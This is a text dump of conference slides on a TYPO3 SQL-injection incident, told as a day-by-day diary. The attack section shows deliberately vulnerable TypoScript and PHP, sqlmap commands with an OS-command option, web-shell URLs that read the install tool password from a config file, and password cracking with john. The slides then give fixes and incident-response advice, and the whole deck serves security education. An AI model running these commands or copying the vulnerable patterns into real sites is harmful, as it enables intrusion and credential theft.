Inspiring people to

shareDiary of a Hack

Vulnerabilities and Attacks

Diary of a Hack

Helmut Hummel <info@helhum.io>

22.04.2016

Vulnerabilities and Exploits

1

2

@helhum

Security

3

4

http://typotic.com/uploads/posts/3427/funny-dude-this-is-boring-01.jpg

5

http://www.pxleyes.com/images/contests/teddy-bears-2/fullsize/Story-time-507bf54d589a1_hires.jpg

6

http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

7

http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif

8

http://i.telegraph.co.uk/multimedia/archive/02210/squirrel_2210134b.jpg

9

https://xkcd.com/327/

10

http://www.kitploit.com/2013/06/john-ripper-v180-fast-password-cracker.html

11

https://ilifejourney.files.wordpress.com/2011/11/spaghetti-mess.jpg

12

http://img3.wikia.nocookie.net/__cb20121122132016/villains/images/f/fb/Janitor_2.jpg

13

http://i.livescience.com/images/i/000/029/390/i02/shutterstock_105432542.jpg?1343404330

14

Diary of a Hack

15

Diary of a Hack

Day 1 - Implementing a feature

16

Diary of a Hack

17

lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where.wrap = colPos=| select.where.data = GP:colPos }

Diary of a Hack

18

lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where.wrap = header like '%|%' select.where.data = GP:search }

Diary of a Hack

Day 2 - Testing the feature

19

Diary of a Hack

20

Diary of a Hack

21

'BE/debug' => '1''FE/debug' => '1''SYS/devIPmask' => '*''SYS/displayErrors' => '1''SYS/sqlDebug' => '1''SYS/exceptionalErrors' => '28674'

Diary of a Hack

22

Diary of a Hack

23

'DB/username' => 'root'

Diary of a Hack

24

Diary of a Hack

Day 3 - Distraction

25

Diary of a Hack

26

Diary of a Hack

Day 4 - Attraction

27

Diary of a Hack

28

https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22

Diary of a Hack

Day 5 - Exploitation

29

Inspiring people to

shareDiary of a Hack

Vulnerabilities and Attacks

Excursion - SQLi

30

Excursion - SQLi

31

SELECT * FROM tt_content WHERE colPos = 0

32

'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']

Excursion - SQLi

33

Excursion - SQLi

34

'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']

Excursion - SQLi

35

'SELECT * FROM tt_content WHERE colPos = 0 or hidden = 1'

$_GET['colPos']

Excursion - SQLi

Disclaimer

36

Don’t do this at home!

37

(unless you have written permit)

38

Diary of a Hack

39

$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos'!GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:

Inspiring people to

shareDiary of a Hack

Vulnerabilities and Attacks

The power of MySQL

40

Diary of a Hack

41

$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos' \ —os-cmd='ls -al'

Diary of a Hack

42

Diary of a Hack

43

http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL!http://security.dev/typo3/sysext/install/Start/Install.php!http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php

Diary of a Hack

44

$ john pwLoaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])password (dummy)guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing

Diary of a Hack

45

Diary of a Hack

Day 5 - Discovery

46

Diary of a Hack

Discovery• Take site offline!

• seriously

• I mean it

47

48

Diary of a Hack

Day 6 - Analysis

49

Diary of a Hack

Analysis• Make a backup of current state (files, DB, logs)

• Search all logs for „suspicious“ entries

• Find point of entry (security issue)

• If in doubt: get help

50

Diary of a Hack

Day 7 - Fix

51

Diary of a Hack

52

lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where = colPos=###colPos### select.markers { colPos.data = GP:colPos } }

Diary of a Hack

53

lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where = header like ###search### select.markers { search.data = GP:search search.wrap = %|% } }

Diary of a Hack

Fix• Close security issue in Code/ Extension/ Core

• Restore from backup

• Or if you really know what you are doing: cleanup installation

• Go online again

• Plan improvements (education, monitoring, …)

54

Diary of a Hack

Day 8 - Improve

55

Inspiring people to

shareSecurity of Web Applications

Vulnerabilities and Attacks

Topictext

Lessons learned• Development/ Testing Environment

• Deploy to Production

• Least privilege

• There is no Software without bugs. Be prepared!

56

Diary of a Hack

Best Practice• Operations

• Regular updates

• Backups

• Monitoring

• Development

• Peer Reviews (TypoScript, Code, Templates)

• (automated) Tests

• Focus

• Education

• Allocate time for all of the above

57

Questions?

58

Inspiring people to

shareSecurity of Web Applications

Vulnerabilities and Attacks

Diary of a Hack

Resources• http://docs.typo3.org/typo3cms/SecurityGuide/

• http://sqlmap.org

• http://www.openwall.com/john/

• https://www.owasp.org/

59

Thank you!

60

61

@helhum

http://helhum.io

info@helhum.io